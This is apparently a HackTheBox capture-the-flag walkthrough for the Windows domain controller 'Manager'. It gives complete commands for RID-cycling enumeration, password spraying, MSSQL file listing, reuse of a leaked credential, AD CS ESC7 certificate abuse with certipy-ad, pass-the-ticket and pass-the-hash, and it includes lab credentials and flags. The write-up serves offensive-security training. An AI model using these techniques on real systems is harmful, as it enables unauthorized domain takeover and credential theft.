HackTheBox | Manager

In this walkthrough, I demonstrate how I obtained complete ownership of Manager on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Medium Challenge
Owned Manager from Hack The Box!
I have just owned machine Manager from Hack The Box

Nmap Results

# Nmap 7.94SVN scan initiated Thu Jan 18 01:18:42 2024 as: nmap -Pn -p- --min-rate 5000 -A -oN nmap.txt 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.012s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-18 13:19:15Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-18T13:20:49+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-18T13:20:49+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.236:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-01-18T13:20:50+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-18T12:01:31
|_Not valid after:  2054-01-18T12:01:31
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-18T13:20:49+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-18T13:20:49+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49386/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49732/tcp open  msrpc         Microsoft Windows RPC
50070/tcp open  unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (86%)
Aggressive OS guesses: Microsoft Windows Server 2019 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2024-01-18T13:20:11
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   12.18 ms 10.10.14.1
2   12.51 ms 10.10.11.236

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 18 01:20:50 2024 -- 1 IP address (1 host up) scanned in 128.46 seconds





Service Enumeration

TCP/53

I add the hostname to my /etc/hosts file:

echo '10.10.11.236    manager.htb dc01.manager.htb' | sudo tee -a /etc/hosts

You can see in the nmap output under tcp/389 (LDAP) that the server name is dc01.manager.htb. I tried to perform a zone transfer, but had no luck, as the server refused the request.



TCP/139, TCP/445, TCP/389

Test Null Session SMB Share Listing

None of these shares are going to be open to us as an anonymous user



Test Anonymous LDAP Queries

No anonymous LDAP queries



Null Session Username Enumeration

💡
Looking at the nmap scan, it's obvious the target is a domain controller -- both by looking at its hostname and its open ports. We can try some null session enumeration tricks to see if we can pull some usernames for further enumeration.
NULL Session Enumerati... | 0xBEN | Notes
NULL Session LDAP, SMB, and RPC may allow a user to authenticate to the service without providing a…

In the past, I've typically used enum4linux for this task, but it did not work this go around. Conveniently, crackmapexec also has an option to bruteforce RIDs using an anonymous session.

crackmapexec smb 10.10.11.236 -d manager.htb -u 'anonymous' -p '' --rid-brute 3000 | tee cme.txt
Get a list of usernames via RID cycling
grep SidTypeUser cme.txt | grep -E '[1-9]{3,}[0-9]{1,}' | awk -v FS=' ' '{print $6}' | sed 's/MANAGER\\//g' > usernames.txt
Output the usernames to a text file
ℹ️
Before we go password spraying with rockyou.txt, we should try credential spraying usernames as passwords
# Output the usernames and preserve casing
cat usernames.txt > passwords.txt
# Output the usernames and convert all charactes to lowercase
cat usernames.txt | sed 's/.*/\L&/g' >> passwords.txt 
Generate a list of passwords matching the usernames
crackmapexec smb 10.10.11.236 -d manager.htb -u usernames.txt -p passwords.txt
Nice, we have a credential!



Dump LDAP with the Credential

ldapdomaindump -u 'MANAGER.HTB\operator' -p 'operator' dc01.manager.htb -o ldd
open ./ldd/domain_users_group_by_group.html
Raven should have access to WinRM on 'tcp/5985'



TCP/80

Gobuster Enumeration

gobuster dir -u http://dc01.manager.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x aspx,html -r -o gobuster-80.txt -t 100
Nothing too interesting in the output here



TCP/1433

Credential Spraying

It is most certainly interesting seeing Microsoft SQL Server exposed on an external address. Since we were able to spray some passwords at SMB using the list worked out from RID cycling, let's take the same approach with MSSQL.

crackmapexec mssql dc01.manager.htb -d manager.htb -u usernames.txt -p passwords.txt
Nice! We can access the SQL server as 'operator'!



Enumerating Access

impacket-mssqlclient 'manager.htb/operator:operator@dc01.manager.htb' -windows-auth
1433 - Pentesting MSSQL - Microsoft SQL Server - HackTricks

As per usual, there is a HackTricks page for MSSQL

I was working my way from the top of the page down, trying a few different tricks, when I got to the NetNTLM theft / relay section. I did try catching the NetNTLM hash, but it was just the computer account DC01$, which can't be relayed due to SMB signing.

However, I did try this suggestion to see what kinds of permissions I have.

Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
Connecting as 'operator' gives me 'guest' or 'public' access to the database



Enumerating Files

In hindsight, I was able to use the xp_dirtree stored procedure to try and load a file from my SMB server running on Kali. So, I should be able to read files from the remote operating system using the same command.

MSSQL Injection - HackTricks

Check out this HackTricks page to learn about some commonly abused 'stored procedures'

If we just run the xp_dirtree command, we can see that we are in the %SYSTEMDRIVE% volume. That's typically the C: volume, but that's not always a guarantee.

The Windows system drive does appear to be the 'C:' volume.
💡
We won't be able to read, copy, move, or create any files on the file system this way. However, the C:\inetpub\wwwroot directory is appealing, because that is the default web root for IIS servers, which happens to be running on this target. We can see files in the web server that we couldn't otherwise uncover using gobuster or a similar tool.

Recall that these files were already uncovered by us using the gobuster scan earlier. That means that we should be able to read the -backup-27-07-23-old.zip file — if the permissions are right. The web.config file is likely unreadable to us from the outside.

We were able to download the file!



Hunting for Interesting Files

unzip website-backup-27-07-23-old.zip -d website-backup
cd website-backup

.old-conf.xml

<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

Excellent! We have a credential for raven. And if you recall from our earlier enumeration, raven is one of the users enabled for WinRM access.





Exploit

A series of misconfigurations allowed us to chain together information from several services to finally get an interactive session on the target. The exploit chain was:

  1. Null session RID cycling to enumerate valid users
  2. A weak password on the operator user gave us access to dump LDAP and find high value users
  3. This weak password also gave us access to MSSQL server, which allowed public execution of the xp_dirtree stored procedure, which revealed a backup file in the web root directory
  4. We downloaded the backup file and found a password for the raven user embedded in a LDAP configuration file
evil-winrm -i dc01.manager.htb -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'





Post-Exploit Enumeration

Operating Environment

OS & Kernel

No permissions to enumerate with 'systeminfo' or 'Get-ComputerInfo'  

Current User

USER INFORMATION
----------------

User Name     SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled



Users and Groups

Local Groups

Cert Publishers
---------------

ObjectClass Name          PrincipalSource
----------- ----          ---------------
User        MANAGER\DC01$ ActiveDirectory


RAS and IAS Servers
-------------------

Allowed RODC Password Replication Group
---------------------------------------

Denied RODC Password Replication Group
--------------------------------------

ObjectClass Name                                 PrincipalSource
----------- ----                                 ---------------
Group       MANAGER\Cert Publishers              ActiveDirectory
Group       MANAGER\Domain Admins                ActiveDirectory
Group       MANAGER\Domain Controllers           ActiveDirectory
Group       MANAGER\Enterprise Admins            ActiveDirectory
Group       MANAGER\Group Policy Creator Owners  ActiveDirectory
User        MANAGER\krbtgt                       ActiveDirectory
Group       MANAGER\Read-only Domain Controllers ActiveDirectory
Group       MANAGER\Schema Admins                ActiveDirectory


DnsAdmins
---------  

Domain Users

Administrator
Guest
krbtgt
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator    

Domain Groups

Administrators
--------------
Domain Admins
Enterprise Admins
Administrator

Users
-----
Domain Users
Authenticated Users
INTERACTIVE

Guests
------
Domain Guests
Guest

IIS_IUSRS
---------
IUSR

Certificate Service DCOM Access
-------------------------------
Authenticated Users

Remote Management Users
-----------------------
Raven

Schema Admins
-------------
Administrator

Enterprise Admins
-----------------
Administrator

Cert Publishers
---------------
DC01$

Domain Admins
-------------
Administrator

Group Policy Creator Owners
---------------------------
Administrator

Pre-Windows 2000 Compatible Access
----------------------------------
DC01$
Authenticated Users

Windows Authorization Access Group
----------------------------------
ENTERPRISE DOMAIN CONTROLLERS

Denied RODC Password Replication Group
--------------------------------------
Read-only Domain Controllers
Group Policy Creator Owners
Domain Admins
Cert Publishers
Enterprise Admins
Schema Admins
Domain Controllers
krbtgt    



Network Configurations

Network Interfaces

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.11.236
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2  

Open Ports

No firewalled ports that weren't previously discovered, or interesting ports bound to loopback.    





Privilege Escalation

Hunting for Privilege Escalation

Since this is a domain controller, I worked over the typical Active Directory post-exploit enumeration process. This guide on HackTricks is a good reference.

Active Directory Methodology - HackTricks

I also have an Active Directory flowchart that I use to direct my thought process.

Active Directory Attack Map
In this post, I share an attack path diagram I’ve created to aid in preparing for and attempting the OSCP and/or PNPT certifications.

After some lengthy enumeration, I found a privilege escalation path by looking at Active Directory Certificate Services (AD CS). You can do this by transferring certify.exe to the target or by using certipy-ad remotely.



Active Directory Certificate Services (AD CS)

certipy-ad find -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -text -vulnerable

And, while there were no vulnerable certificate templates that I could use, raven does have dangerous permissions — ESC7.

Raven has 'Enroll' and 'ManageCa' access rights

HackTricks has a nice page on AD CS privilege escalation and we can skip to the part on ESC7:

  • Attack 1 won't work for us, because we don't have permissions to modify the registry or restart the AD CS service
  • Attack 2 will work for us, as we have the prerequisite permissions

Executing Attack 2

Giving Ourselves Manage Certificates Permissions

certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username 'raven' -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Giving ourselves 'Manage Certificates' permissions



Enable the SubCA Template

certipy-ad ca -ca 'manager-DC01-CA' -list-templates -username 'raven' -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 | grep SubCA

Check if it's enabled

certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven' -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236

If not enabled, enable the SubCA template



Request to Enroll a Certificate in the SubCA Template

ℹ️
We are requesting to enroll a certificate for the Domain Administrator administrator@manager.htb in the SubCA template as a regular user, raven. We can make this request as we already had ManageCA rights and gave ourselves ManageCertificates rights by adding ourselves as an officer.
certipy-ad req -username 'raven' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -dc-ip 10.10.11.236 -template SubCA -upn administrator@manager.htb
In the output, note that my certificate request ID is '13'



Approve Our Own Request

ℹ️
Since we have ManageCA and ManageCertificates rights, we have permissions to approve requests on the SubCA template assuming we know the request ID.
certipy-ad ca -ca 'manager-DC01-CA' -username 'raven' -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -issue-request 13



Retrieve the Certificate

certipy-ad req -username 'raven' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -dc-ip 10.10.11.236 -retrieve 13



Authenticate with the Certificate

certipy-ad auth -username 'administrator' -domain 'manager.htb' -dc-ip '10.10.11.236' -pfx ./administrator.pfx
⚠️
The screenshot above shows Kerberos error message KRB_AP_ERR_SKEW. This is due to Kerberos requirements that clocks on the KDC and the client be in sync. You can use the faketime application to do a per-process NTP sync with the NTP service running on the domain controller. And, you can install faketime by running sudo apt install -y faketime.
faketime "$(ntpdate -q dc01.manager.htb | cut -d ' ' -f 1,2)" certipy-ad auth -username 'administrator' -domain 'manager.htb' -dc-ip '10.10.11.236' -pfx administrator.pfx



Pass the Ticket

💡
You can use your cached Kerberos ticket(s) a couple of ways — export the path to the ticket as an environment variable, or use it as a per-command variable. I'll be using the latter option in the PTT attacks.
export KRB5CCNAME="/path/to/ticket.ccache" 
/usr/bin/command args

Exported as an environment variable, then used by one or many commands

KRB5CCNAME="/path/to/ticket.ccache" /usr/bin/command args

Used as an ad-hoc, per-command variable

KRB5CCNAME="$PWD/administrator.ccache" faketime "$(ntpdate -q dc01.manager.htb | cut -d ' ' -f 1,2)" crackmapexec smb dc01.manager.htb --use-kcache
Use my cached TGT to request a TGS to authenticate to SMB on DC01
KRB5CCNAME="$PWD/administrator.ccache" faketime "$(ntpdate -q dc01.manager.htb | cut -d ' ' -f 1,2)" impacket-changepasswd -k -no-pass -newpass 'P@ssword1!' -admin -dc-ip 10.10.11.236 'manager.htb/administrator@dc01.manager.htb'
Change the password for the 'administrator' user
evil-winrm -i dc01.manager.htb -u 'administrator@manager.htb' -p 'P@ssword1!'
💡
We don't need faketime here, since we're not using Kerberos authentication.
Log in as administrator with the new password



Pass the Hash

⚠️
Since I changed the password just before this, I'll have to dump the hash again.
evil-winrm -i dc01.manager.htb -u 'administrator@manager.htb' -H 517c702b2b6dc0f09ef1560366692c3d
💡
We only need the NT hash for this attack, which is to the right of the : in the NTLM hash. The left value is the legacy LM hash, which is present solely for compatibility's sake.
evil-winrm -i dc01.manager.htb -u 'administrator@manager.htb' -H 517c702b2b6dc0f09ef1560366692c3d
ℹ️
This Pass-the-Hash attack works, because we're using the built-in Administrator account to login (RID 500). By default, this will not work other domain administrators and you should consider using a Pass-the-Ticket attack, or attempt to crack the hash and pass the password.



Flags

User

3d8092a1b800aaafaaf464d4d6a1c375

Root

bcf6e0cff8d24d17c5d08b54a08f5dda
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.